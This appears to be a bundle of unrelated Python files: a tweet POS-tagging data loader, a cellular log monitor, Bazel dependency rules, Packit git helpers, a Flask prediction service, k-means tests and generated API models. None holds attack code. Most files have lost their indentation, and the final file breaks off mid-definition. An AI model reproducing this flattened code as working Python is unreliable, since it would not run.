"""
Contains I/O functions
"""
import numpy
import theano
import logging
import sys
import tempfile
from collections import defaultdict
def build_character_dictionary(path, chars = {}):
with open(path, 'r') as fin:
lineno = 0
for line in fin:
lineno += 1
line = line.strip()
if len(line) == 0:
continue
try:
word, _ = line.split('\t')
for c in word:
if c not in chars:
chars[c] = len(chars) + 1
except ValueError as ex:
print ex, lineno, line
return chars
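# Usage sketch (assumes a CoNLL-style file with one "word<TAB>tag" pair per
# line and blank lines between tweets, which is what the parser above expects;
# the path is hypothetical):
#     chars = build_character_dictionary("train.conll")
#     # chars maps every character seen in the word column to an index >= 1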
def build_word_dictionary(path, words = {}):
with open(path, 'r') as fin:
for line in fin:
line = line.strip()
if len(line) == 0:
continue
word, _ = line.split('\t')
if word not in words:
words[word] = len(words) + 1
return words
def build_tag_dictionary(path, tags={}):
with open(path, 'r') as fin:
for line in fin:
line = line.strip()
if len(line) == 0:
continue
_, tag = line.split('\t')
if tag not in tags:
tags[tag] = len(tags) + 1
return tags
def get_tweet_words(path):
t = defaultdict(list)
c = 0
with open(path, 'r') as fin:
for line in fin:
line = line.strip()
if len(line) == 0:
c += 1
continue
word, pos = line.split('\t')
word = word.decode('utf8')
t[c].append(word)
return t
def get_max_word_count(path):
t = get_tweet_words(path)
m = [len(t[c]) for c in t]
m = int(numpy.percentile(m, 99))
#m = int(numpy.median([len(t[c]) for c in t]))
logging.debug("get_max_word_count('%s') = %d", path, m)
return m
def get_max_word_length(path):
t = get_tweet_words(path)
m = 0
d = []
for c in t:
for w in t[c]:
d.append(len(w))
if len(w) >= m:
m = len(w)
logging.debug('length: %s, %d', w, m)
m = numpy.percentile(d, 99)
logging.debug("get_max_word_length('%s') = %d", path, m)
return m
def get_max_length(path):
t = get_tweet_words(path)
t = {c: u"".join(t[c]) for c in t}
m = max([len(t[c]) for c in t])
logging.debug('get_max_length(%s) = %d', path, m)
return m
def load_pos_tagged_data(path, chardict = {}, worddict={}, posdict={}, overlap=15, allow_append=True):
if allow_append:
build_character_dictionary(path, chardict)
build_word_dictionary(path, worddict)
build_tag_dictionary(path, posdict)
cur_chars, cur_words, cur_labels = [], [], []
words, chars, labels = [], [], []
with open(path, 'r') as fin:
for line in fin:
line = line.strip()
if len(line) == 0:
chars.append(cur_chars[:-1])
words.append(cur_words[:-1])
labels.append(cur_labels)
cur_chars = []
cur_labels = []
cur_words = []
continue
word, pos = line.split('\t')
if word not in worddict and allow_append:
worddict[word] = len(worddict)+1
for c in word:
if c not in chardict and allow_append:
chardict[c] = len(chardict)+1
if c in chardict:
cur_chars.append(chardict[c])
else:
cur_chars.append(0)
if word in worddict:
cur_words.append(worddict[word])
else:
cur_words.append(0)
if pos not in posdict and allow_append:
posdict[pos] = len(posdict)+1
if pos in posdict:
cur_labels.append(posdict[pos])
else:
cur_labels.append(0)
if word in worddict:
cur_words.append(worddict[word])
else:
cur_words.append(0)
cur_chars.append(0)
if len(cur_chars) > 0:
chars.append(cur_chars)
words.append(cur_words)
labels.append(cur_labels)
return chars, words, labels
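# load_pos_tagged_data returns three parallel lists with one entry per tweet:
# character indices, word indices and tag indices. With allow_append=False,
# any character, word or tag missing from the dictionaries is mapped to 0.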
def string_to_unprepared_format(text, chardict, worddict):
with open('sample.conll', 'wb') as fp:
for word in text.split():
#if word not in worddict:
# raise Exception((word, "not in dictionary"))
line = '%s\t?\n' % (word,)
fp.write(line)
# print >> fp, "%s\t?" % (word,)
    chars, words, labels = load_pos_tagged_data("sample.conll", chardict, worddict, {'?': 0}, allow_append=False)
return [], chars, words, labels
def prepare_data(char_seqs, labels, maxw, maxwlen, dim_proj):
"""
Create the matrices from the datasets.
This pad each sequence to the same length: the length of the
longest sequence or maxlen.
if maxlen is set, we will cut all sequences to this maximum
length
This swap the axis!
"""
# x: a list of sentences
n_samples = len(char_seqs)
x_c = numpy.zeros((maxw, maxwlen, n_samples)).astype('int8')
x_mask = numpy.zeros((maxw, maxwlen, n_samples, dim_proj)).astype(theano.config.floatX)
y = numpy.zeros((maxw, n_samples)).astype('int8')
y_mask = numpy.zeros((maxw, n_samples)).astype('int8')
for idx, (s_c, l) in enumerate(zip(char_seqs, labels)):
# idx is the current position in the mini-batch
# s_c is a list of characters
# s_w is a list of words
# l is a list of labels
c = 0
p = 0
warning = None
for j, a in enumerate(s_c):
# j is the current character in this tweet
# idx is the current tweet in this minibatch
# c is the current word (can be up to 16)
# p is the current character in this word
if a == 0:
# This current character is a space
# Increase the word count and continue
c += 1
p = 0
j += 1 # Temporarily skip to next loop char
if c >= maxw:
if j != len(s_c):
warning = "truncation: too many words in this tweet! {}-{}".format(j, len(s_c))
break
if c >= len(l):
if j != len(s_c):
warning = "truncation: too many words for these labels {}-{}".format(j, len(s_c))
break
if p >= x_c.shape[1]:
warning = "truncation: too many characters for this maxwlen"
else:
x_c[c, p, idx] = a
x_mask[c, p, idx] = numpy.ones(dim_proj)
y[c, idx] = l[c]
y_mask[c, idx] = 1
p += 1
if warning is not None:
#logging.warning("%s", warning)
pass
return x_c, x_mask, y, y_mask
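# prepare_data returns x_c of shape (maxw, maxwlen, n_samples), x_mask of
# shape (maxw, maxwlen, n_samples, dim_proj) and y/y_mask of shape
# (maxw, n_samples); positions beyond a tweet's actual words remain zero.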
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.biomass import biomass
def test_biomass():
"""Test module biomass.py by downloading
biomass.csv and testing shape of
extracted data has 153 rows and 8 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = biomass(test_path)
try:
assert x_train.shape == (153, 8)
    except Exception:
        shutil.rmtree(test_path)
        raise
|
#!/usr/bin/python
# Filename: monitor-example.py
import os
import sys
# Import MobileInsight modules
from mobile_insight.monitor import OnlineMonitor
from mobile_insight.analyzer import MsgLogger
if __name__ == "__main__":
if len(sys.argv) < 3:
print("Error: please specify physical port name and baudrate.")
        print("Usage: %s SERIAL_PORT_NAME BAUDRATE" % __file__)
sys.exit(1)
# Initialize a 3G/4G monitor
src = OnlineMonitor()
src.set_serial_port(sys.argv[1]) # the serial port to collect the traces
src.set_baudrate(int(sys.argv[2])) # the baudrate of the port
# Save the monitoring results as an offline log
src.save_log_as("./monitor-example.mi2log")
# print("finish config")
# Enable 3G/4G messages to be monitored. Here we enable RRC (radio
# resource control) monitoring
# src.enable_log("LTE_RRC_OTA_Packet")
# src.enable_log("WCDMA_RRC_OTA_Packet")
# src.enable_log("WCDMA_RRC_Serv_Cell_Info")
# print("finish enable")
# Dump the messages to std I/O. Comment it if it is not needed.
dumper = MsgLogger()
dumper.set_source(src)
dumper.set_decoding(MsgLogger.XML) # decode the message as xml
# Start the monitoring
src.run()
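# Example invocation (sketch; the serial device name varies by platform):
#     python monitor-example.py /dev/ttyUSB0 9600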
|
"""Adds repostories/archives."""
########################################################################
# DO NOT EDIT THIS FILE unless you are inside the
# https://github.com/3rdparty/bazel-rules-curl repository. If you
# encounter it anywhere else it is because it has been copied there in
# order to simplify adding transitive dependencies. If you want a
# different version of bazel-rules-curl follow the Bazel build
# instructions at https://github.com/3rdparty/bazel-rules-curl.
########################################################################
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
def repos(external = True, repo_mapping = {}):
if "rules_foreign_cc" not in native.existing_rules():
http_archive(
name = "rules_foreign_cc",
url = "https://github.com/bazelbuild/rules_foreign_cc/archive/0.5.1.tar.gz",
sha256 = "33a5690733c5cc2ede39cb62ebf89e751f2448e27f20c8b2fbbc7d136b166804",
strip_prefix = "rules_foreign_cc-0.5.1",
repo_mapping = repo_mapping,
)
if external and "com_github_4rdparty_bazel_rules_libcurl" not in native.existing_rules():
http_archive(
name = "com_github_4rdparty_bazel_rules_libcurl",
url = "https://github.com/4rdparty/bazel-rules-libcurl/archive/refs/tags/libcurl-7_78_0.tar.gz",
sha256 = "8de476145536ded8df4aacf98f3d5511721d291f78568c1873bab8a080a4e985",
strip_prefix = "bazel-rules-libcurl-libcurl-7_78_0",
repo_mapping = repo_mapping,
)
|
from __future__ import absolute_import, unicode_literals
from setuptools import setup, find_packages
VERSION = '0.1.0'
NAME = 'pinsage-pytorch'
DESCRIPTION = 'This is a PinSage pytorch library.'
URL = 'https://github.com/rlji/pinsage-pytorch'
EMAIL = 'me@example.com'
AUTHOR = 'rlji'
# What python versions are supported?
REQUIRES_PYTHON = ">=3.6"
# What packages are required for this module to be executed?
REQUIRED = [
'dgl', 'pandas',
'dask[complete]',
'torch', 'numpy',
'scipy', 'tqdm',
]
# What packages are optional?
EXTRAS = {
}
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=["tests"]),
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True,
)
|
# Copyright Contributors to the Packit project.
# SPDX-License-Identifier: MIT
import logging
import re
import subprocess
import tempfile
from pathlib import Path
from typing import Tuple, Optional, Union, List
import git
import yaml
from ogr.parsing import RepoUrl, parse_git_repo
from packit.exceptions import PackitException
logger = logging.getLogger(__name__)
class RepositoryCache:
"""
    Cache for git repositories based on the reference option of `git clone`.
    * The cache is located in the specified directory
      and contains a separate git repository for each project.
    * The project name is used to match the git project in the cache.
"""
def __init__(self, cache_path: Union[str, Path], add_new=False) -> None:
self.cache_path = (
Path(cache_path) if isinstance(cache_path, str) else cache_path
)
self.add_new = add_new
logger.debug(
f"Instantiation of the repository cache at {self.cache_path}. "
f"New projects will {'not ' if not self.add_new else ''}be added."
)
@property
def cached_projects(self) -> List[str]:
"""Project names we have in the cache."""
if not self.cache_path.is_dir():
self.cache_path.mkdir(parents=True)
return [f.name for f in self.cache_path.iterdir() if f.is_dir()]
def _clone(self, **kwargs) -> git.Repo:
"""Wrapper around git function so we are able to check the call in tests more easily."""
return git.repo.Repo.clone_from(**kwargs)
def get_repo(
self,
url: str,
directory: Union[Path, str] = None,
) -> git.Repo:
"""
Clone the repository.
* If we have this repository in a cache, use the cached repo as a reference when cloning.
* If we don't have this repository in a cache and {add_new} is True,
clone the repository to cache first and then use it as a reference.
:param url: will be used to clone the repo
:param directory: target path for cloning the repository
:return: cloned repository
"""
directory = str(directory) if directory else tempfile.mkdtemp()
if is_git_repo(directory=directory):
logger.debug(f"Repo already exists in {directory}.")
return git.repo.Repo(directory)
logger.debug(
f"Cloning repo {url} -> {directory} using repository cache at {self.cache_path}"
)
cached_projects = self.cached_projects
cached_projects_str = "\n".join(f"- {project}" for project in cached_projects)
logger.debug(
f"Repositories in the cache ({len(cached_projects)} project(s)):\n{cached_projects_str}"
)
project_name = RepoUrl.parse(url).repo
reference_repo = self.cache_path.joinpath(project_name)
if project_name not in cached_projects and self.add_new:
logger.debug(f"Creating reference repo: {reference_repo}")
self._clone(url=url, to_path=str(reference_repo), tags=True)
if self.add_new or project_name in cached_projects:
logger.debug(f"Using reference repo: {reference_repo}")
return self._clone(
url=url, to_path=directory, tags=True, reference=str(reference_repo)
)
return self._clone(url=url, to_path=directory, tags=True)
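# Usage sketch (the cache path, URL and target directory are illustrative only):
#     cache = RepositoryCache("/home/user/.cache/packit/repos", add_new=True)
#     repo = cache.get_repo("https://github.com/packit/ogr.git", directory="/tmp/ogr")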
def is_git_repo(directory: Union[Path, str]) -> bool:
"""
Test, if the directory is a git repo.
(Has .git subdirectory?)
"""
return Path(directory, ".git").is_dir()
def get_repo(url: str, directory: Union[Path, str] = None) -> git.Repo:
"""
Use directory as a git repo or clone repo to the tempdir.
"""
directory = str(directory) if directory else tempfile.mkdtemp()
if is_git_repo(directory=directory):
logger.debug(f"Repo already exists in {directory}.")
repo = git.repo.Repo(directory)
else:
logger.debug(f"Cloning repo {url} -> {directory}")
repo = git.repo.Repo.clone_from(url=url, to_path=directory, tags=True)
return repo
def get_namespace_and_repo_name(url: str) -> Tuple[Optional[str], str]:
parsed_git_repo = parse_git_repo(url)
if parsed_git_repo is None or not parsed_git_repo.repo:
raise PackitException(
f"Invalid URL format, can't obtain namespace and repository name: {url}"
)
return parsed_git_repo.namespace, parsed_git_repo.repo
def is_a_git_ref(repo: git.Repo, ref: str) -> bool:
try:
commit = repo.commit(ref)
return bool(commit)
except git.BadName:
return False
def get_default_branch(repository: git.Repo) -> str:
"""
    Returns the default branch for newly created repos in the parent directory of
    the passed-in repository. Accepts `repository` to ensure the closest override of
    git configuration is used.
Args:
repository (git.Repo): Git repository closest to the directory where
the configuration is applied.
Returns:
        Default branch for new repos; returns `master` if not supported or
        not configured.
"""
config = repository.config_reader()
return config.get_value("init", "defaultBranch", "master")
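# For example, with `git config init.defaultBranch main` in effect for the
# repository, get_default_branch(repo) returns "main"; otherwise it falls
# back to "master".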
def git_remote_url_to_https_url(inp: str) -> str:
"""
    Turn the provided git remote URL into an HTTPS URL;
    returns an empty string if the input can't be processed.
"""
logger.debug(f"Parsing git remote URL {inp!r} and converting it to https-like URL.")
parsed_repo = parse_git_repo(inp)
if not parsed_repo or not parsed_repo.hostname:
logger.debug(f"{inp!r} is not an URL we recognize.")
return ""
if inp.startswith(("http", "https")):
logger.debug(f"Provided input {inp!r} is an url.")
return inp
optional_suffix = ".git" if inp.endswith(".git") else ""
url_str = "https://{}/{}/{}{}".format(
parsed_repo.hostname, parsed_repo.namespace, parsed_repo.repo, optional_suffix
)
logger.debug(f"URL {inp!r} turned into HTTPS {url_str!r}")
return url_str
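# Illustrative expectation (assuming ogr's parse_git_repo handles SSH remotes):
#     git_remote_url_to_https_url("git@github.com:packit/ogr.git")
#     would yield "https://github.com/packit/ogr.git".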
def get_current_version_command(
glob_pattern: str, refs: Optional[str] = "tags"
) -> List[str]:
"""
    Return the command that finds the latest git reference matching the given pattern.
:param glob_pattern: pattern that is used to find latest ref
:param refs: specifies what kind of ref is used; \
default is `"tags"` that searches through all tags (including non-annotated), \
pass `None` to search only annotated tags or `"all"` to search through \
all refs (including branches and remote refs)
:return: command to find latest ref
"""
return [
"git",
"describe",
"--abbrev=0",
f"--{refs}" if refs else "",
"--match",
glob_pattern,
]
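# For example, get_current_version_command("v*") returns
# ["git", "describe", "--abbrev=0", "--tags", "--match", "v*"], which prints
# the most recent reachable tag matching "v*" when run inside a repository.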
def create_new_repo(cwd: Path, switches: List[str]):
subprocess.check_call(["git", "init"] + switches + [str(cwd)])
# TODO: Replace with -b / --initial-branch in `git init` when possible
if "--bare" not in switches:
subprocess.check_call(["git", "checkout", "-b", "main"], cwd=cwd)
else:
subprocess.check_call(
["git", "symbolic-ref", "HEAD", "refs/heads/main"], cwd=cwd
)
def git_patch_ish(patch: str) -> str:
"""
Massage patch to look like a Git-style patch, so that it can
be passed to 'git patch-id' in order to calculate a patch-id.
:param patch: Patch to transform.
:return: Transformed patch.
"""
    # Pretend the format is 'diff --git'
pattern = re.compile(r"^diff -\w+ ", flags=re.MULTILINE)
repl = r"diff --git "
patch = re.sub(pattern, repl, patch)
# Remove timestamps from comparison lines
pattern = re.compile(r"^((---|\+\+\+) .+)\t\d{4}.+$", flags=re.MULTILINE)
repl = r"\1"
patch = re.sub(pattern, repl, patch)
# Add missing 'diff --git' lines
if "diff --git " not in patch:
# Timestamps (see above) already need to be removed
# for this substitution pattern to work.
pattern = re.compile(r"(\n--- (.+)\n\+\+\+ (.+)\n)")
repl = r"\ndiff --git \2 \3\1"
patch = re.sub(pattern, repl, patch)
return patch
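# For example, a header line "diff -up a/f.c b/f.c" is rewritten to
# "diff --git a/f.c b/f.c" and trailing tab-separated timestamps on
# "--- "/"+++ " lines are stripped, so 'git patch-id' accepts the patch.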
def get_message_from_metadata(metadata: dict, header: Optional[str] = None) -> str:
if not isinstance(metadata, dict):
raise PackitException(
f"We can save only dictionaries to metadata. Not {metadata}"
)
content = (
yaml.dump(metadata, indent=4, default_flow_style=False) if metadata else ""
)
if not header:
return content
return f"{header}\n\n{content}"
def get_metadata_from_message(commit: git.Commit) -> Optional[dict]:
"""
    Try to load YAML from the git commit message.
    We keep dropping the first line until the rest of the content can be
    YAML-loaded into a dictionary (a YAML mapping).
    If nothing is found, return None.
Reference:
https://gitpython.readthedocs.io/en/stable/reference.html
?highlight=archive#module-git.objects.commit
e.g.:
I)
key: value
another: value
-> {"key": "value", "another": "value"}
II)
    One sentence.
key: value
another: value
-> {"key": "value", "another": "value"}
III)
A lot of
text
before keys.
key: value
another: value
-> {"key": "value", "another": "value"}
IV)
Other values are supported as well:
key:
- first
- second
- third
:param commit: git.Commit object
:return: dict loaded from message if it satisfies the rules above
"""
splitted_message = commit.message.split("\n")
for i in range(len(splitted_message)):
message_part = "\n".join(splitted_message[i:])
try:
loaded_part = yaml.safe_load(message_part)
except yaml.YAMLError:
continue
if isinstance(loaded_part, dict):
return loaded_part
return None
|
# def yetki_sorgula(page):
# def inner(role):
# if role == "admin" :
# print("{0} rolü {1} sayfasına ulaşabilir." .format(page, role))
# else:
# print("{0} rolü {1} sayfasına ulaşamaz." .format(page, role))
# return inner
# user1 = yetki_sorgula('arayüz')
# print(user1("admin"))
def islem(islem_adi):
def toplam(*args):
toplam = 0
for i in args:
toplam+=i
return toplam
def carpma(*args):
carpim = 1
for i in args:
carpim*=i
return carpim
if islem_adi == "toplam":
return toplam
else:
return carpma
toplama = islem("toplam")
print(toplama(1,3,5,7,9))
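# The multiplication branch works the same way, e.g. (derived from the code
# above): carpma_islemi = islem("carpma"); print(carpma_islemi(2, 3, 4))  # 24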
|
import numpy as np
import pandas as pd
import os
import joblib
def preparedata(df):
    x = df.drop("y", axis=1)
    y = df["y"]
    return x, y
def save_model(model, filename):
    model_dir = "model"
    os.makedirs(model_dir, exist_ok=True)
    filepath = os.path.join(model_dir, filename)
    joblib.dump(model, filepath)
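# Usage sketch (hypothetical frame and estimator; names are illustrative only):
#     df = pd.DataFrame({"x1": [0, 1], "x2": [1, 0], "y": [0, 1]})
#     X, y = preparedata(df)
#     save_model(fitted_model, "model.joblib")  # writes model/model.joblib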
|
import random
import numpy as np
from typing import Dict, List
from flask import Flask
from flask_restx import Resource, Api
# from numpy import genfromtxt
from ubatch import ubatch_decorator
# from keras.models import load_model
from sklearn.datasets import fetch_20newsgroups
from sklearn.model_selection import train_test_split
from joblib import load
ngd = fetch_20newsgroups(subset="all")
X = ngd.data
y = ngd.target
_, X_test, _, _ = train_test_split(X, y, test_size=0.33)
model = load("xgbregressor.joblib")
# X_test = genfromtxt("xgbregressor_inputs.csv", delimiter=",")
app = Flask(__name__)
api = Api(app)
@ubatch_decorator(max_size=100, timeout=0.01)
def predict(data: List[np.ndarray]) -> List[np.float32]:
return model.predict(np.array(data)) # type: ignore
@api.route("/predict_ubatch")
class BatchPredict(Resource):
def post(self) -> Dict[str, float]:
output = predict.ubatch(random.choice(X_test))
return {"prediction": float(output)}
@api.route("/predict")
class Predict(Resource):
def post(self) -> Dict[str, float]:
output = predict([random.choice(X_test)])[0]
return {"prediction": float(output)}
|
from api.caching.caching_shared import getDatabase
__author__ = 'Michael Pryor'
if __name__ == '__main__':
db = getDatabase()
db.place.remove()
db.geocode.remove()
|
"""
Test for Bradley & Fayyad 1998 initialisation algorithm
"""
import unittest
import numpy as np
from datasets import testloader
from initialisations import bradley as bfinit
import kmeans
# pylint: disable=R0201,W0212
class BfTestSuite(unittest.TestCase):
"""Test suite for B&F"""
def test_code_runs(self):
"""At least prove it runs"""
dataset = testloader.load_iris()
centroids = bfinit.generate(dataset.data, 3)
self.assertEqual((3, 4), centroids.shape)
def test_with_hartigan(self):
"""A tiny dataset which can't possibly work here"""
dataset = testloader.load_hartigan()
with self.assertRaises(ValueError):
bfinit.generate(dataset.data, 3)
def test_find_furthest(self):
"""Find the data point furthest from its cluster center"""
distances = np.array([
[1, 2, 3], # 1
[7, 5, 16], # 5
[7, 26, 4], # 4
[19, 20, 21], # 19
[6, 18, 8] # 6
])
np.testing.assert_equal(bfinit._find_furthest(distances), [3])
np.testing.assert_equal(np.sort(bfinit._find_furthest(distances, 2)),
[3, 4])
np.testing.assert_equal(np.sort(bfinit._find_furthest(distances, 3)),
[1, 3, 4])
def test_with_1_empty(self):
"""Seeds and data known to leave one empty cluster after k_means(),
and thus trigger k_means_mod() to reassign a centroid"""
seeds = np.array([
[5.4, 3.0, 4.5, 1.5],
[6.7, 3.0, 5.0, 1.7],
[5.1, 3.8, 1.5, 0.3], # Doesn't get any data points assigned
])
data = np.array([
# Assigned to 0 but is furthest, so becomes the new 2
[6.4, 2.9, 4.3, 1.3],
[6.3, 3.4, 5.6, 2.4],
[6.8, 3.0, 5.5, 2.1],
[5.0, 2.0, 3.5, 1.0],
[5.8, 2.7, 5.1, 1.9],
])
expected_labels = [2, 1, 1, 0, 0]
expected_centroids = [
[5.4, 2.35, 4.3, 1.45],
[6.55, 3.2, 5.55, 2.25],
[6.4, 2.9, 4.3, 1.3], # The new 2
]
centroids = bfinit._k_means_mod(seeds, data, len(seeds))
labels = kmeans.distance_table(data, centroids).argmin(1)
np.testing.assert_array_equal(labels, expected_labels)
np.testing.assert_array_equal(centroids, expected_centroids)
def _test_with_n_empty(self):
"""Seeds and data known to leave more than one empty cluster
This is left as TODO for now, since no way can I force sklearn to
give me more than one empty cluster.
"""
|
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ItemRevguard(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'revguard_canceled_csr_prompt_group': 'int',
'revguard_canceled_ivr_prompt_group': 'int',
'revguard_canceled_web_prompt_group': 'int',
'revguard_client_brand': 'int',
'revguard_csr_prompt_group': 'int',
'revguard_ivr_prompt_group': 'int',
'revguard_web_prompt_group': 'int'
}
attribute_map = {
'revguard_canceled_csr_prompt_group': 'revguard_canceled_csr_prompt_group',
'revguard_canceled_ivr_prompt_group': 'revguard_canceled_ivr_prompt_group',
'revguard_canceled_web_prompt_group': 'revguard_canceled_web_prompt_group',
'revguard_client_brand': 'revguard_client_brand',
'revguard_csr_prompt_group': 'revguard_csr_prompt_group',
'revguard_ivr_prompt_group': 'revguard_ivr_prompt_group',
'revguard_web_prompt_group': 'revguard_web_prompt_group'
}
def __init__(self, revguard_canceled_csr_prompt_group=None, revguard_canceled_ivr_prompt_group=None, revguard_canceled_web_prompt_group=None, revguard_client_brand=None, revguard_csr_prompt_group=None, revguard_ivr_prompt_group=None, revguard_web_prompt_group=None): # noqa: E501
"""ItemRevguard - a model defined in Swagger""" # noqa: E501
self._revguard_canceled_csr_prompt_group = None
self._revguard_canceled_ivr_prompt_group = None
self._revguard_canceled_web_prompt_group = None
self._revguard_client_brand = None
self._revguard_csr_prompt_group = None
self._revguard_ivr_prompt_group = None
self._revguard_web_prompt_group = None
self.discriminator = None
if revguard_canceled_csr_prompt_group is not None:
self.revguard_canceled_csr_prompt_group = revguard_canceled_csr_prompt_group
if revguard_canceled_ivr_prompt_group is not None:
self.revguard_canceled_ivr_prompt_group = revguard_canceled_ivr_prompt_group
if revguard_canceled_web_prompt_group is not None:
self.revguard_canceled_web_prompt_group = revguard_canceled_web_prompt_group
if revguard_client_brand is not None:
self.revguard_client_brand = revguard_client_brand
if revguard_csr_prompt_group is not None:
self.revguard_csr_prompt_group = revguard_csr_prompt_group
if revguard_ivr_prompt_group is not None:
self.revguard_ivr_prompt_group = revguard_ivr_prompt_group
if revguard_web_prompt_group is not None:
self.revguard_web_prompt_group = revguard_web_prompt_group
@property
def revguard_canceled_csr_prompt_group(self):
"""Gets the revguard_canceled_csr_prompt_group of this ItemRevguard. # noqa: E501
Canceled CSR prompt group # noqa: E501
:return: The revguard_canceled_csr_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_canceled_csr_prompt_group
@revguard_canceled_csr_prompt_group.setter
def revguard_canceled_csr_prompt_group(self, revguard_canceled_csr_prompt_group):
"""Sets the revguard_canceled_csr_prompt_group of this ItemRevguard.
Canceled CSR prompt group # noqa: E501
:param revguard_canceled_csr_prompt_group: The revguard_canceled_csr_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_canceled_csr_prompt_group = revguard_canceled_csr_prompt_group
@property
def revguard_canceled_ivr_prompt_group(self):
"""Gets the revguard_canceled_ivr_prompt_group of this ItemRevguard. # noqa: E501
IVR prompt group # noqa: E501
:return: The revguard_canceled_ivr_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_canceled_ivr_prompt_group
@revguard_canceled_ivr_prompt_group.setter
def revguard_canceled_ivr_prompt_group(self, revguard_canceled_ivr_prompt_group):
"""Sets the revguard_canceled_ivr_prompt_group of this ItemRevguard.
IVR prompt group # noqa: E501
:param revguard_canceled_ivr_prompt_group: The revguard_canceled_ivr_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_canceled_ivr_prompt_group = revguard_canceled_ivr_prompt_group
@property
def revguard_canceled_web_prompt_group(self):
"""Gets the revguard_canceled_web_prompt_group of this ItemRevguard. # noqa: E501
Canceled web prompt group # noqa: E501
:return: The revguard_canceled_web_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_canceled_web_prompt_group
@revguard_canceled_web_prompt_group.setter
def revguard_canceled_web_prompt_group(self, revguard_canceled_web_prompt_group):
"""Sets the revguard_canceled_web_prompt_group of this ItemRevguard.
Canceled web prompt group # noqa: E501
:param revguard_canceled_web_prompt_group: The revguard_canceled_web_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_canceled_web_prompt_group = revguard_canceled_web_prompt_group
@property
def revguard_client_brand(self):
"""Gets the revguard_client_brand of this ItemRevguard. # noqa: E501
Client brand # noqa: E501
:return: The revguard_client_brand of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_client_brand
@revguard_client_brand.setter
def revguard_client_brand(self, revguard_client_brand):
"""Sets the revguard_client_brand of this ItemRevguard.
Client brand # noqa: E501
:param revguard_client_brand: The revguard_client_brand of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_client_brand = revguard_client_brand
@property
def revguard_csr_prompt_group(self):
"""Gets the revguard_csr_prompt_group of this ItemRevguard. # noqa: E501
CSR prompt group # noqa: E501
:return: The revguard_csr_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_csr_prompt_group
@revguard_csr_prompt_group.setter
def revguard_csr_prompt_group(self, revguard_csr_prompt_group):
"""Sets the revguard_csr_prompt_group of this ItemRevguard.
CSR prompt group # noqa: E501
:param revguard_csr_prompt_group: The revguard_csr_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_csr_prompt_group = revguard_csr_prompt_group
@property
def revguard_ivr_prompt_group(self):
"""Gets the revguard_ivr_prompt_group of this ItemRevguard. # noqa: E501
IVR prompt group # noqa: E501
:return: The revguard_ivr_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_ivr_prompt_group
@revguard_ivr_prompt_group.setter
def revguard_ivr_prompt_group(self, revguard_ivr_prompt_group):
"""Sets the revguard_ivr_prompt_group of this ItemRevguard.
IVR prompt group # noqa: E501
:param revguard_ivr_prompt_group: The revguard_ivr_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_ivr_prompt_group = revguard_ivr_prompt_group
@property
def revguard_web_prompt_group(self):
"""Gets the revguard_web_prompt_group of this ItemRevguard. # noqa: E501
Web prompt group # noqa: E501
:return: The revguard_web_prompt_group of this ItemRevguard. # noqa: E501
:rtype: int
"""
return self._revguard_web_prompt_group
@revguard_web_prompt_group.setter
def revguard_web_prompt_group(self, revguard_web_prompt_group):
"""Sets the revguard_web_prompt_group of this ItemRevguard.
Web prompt group # noqa: E501
:param revguard_web_prompt_group: The revguard_web_prompt_group of this ItemRevguard. # noqa: E501
:type: int
"""
self._revguard_web_prompt_group = revguard_web_prompt_group
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ItemRevguard, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ItemRevguard):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'FileSystem.Node.FileSystem_' : {
'meta_info' : _MetaInfoClass('FileSystem.Node.FileSystem_',
False,
[
_MetaInfoClassMember('flags', ATTRIBUTE, 'str' , None, None,
[], [],
''' Flags of file system
''',
'flags',
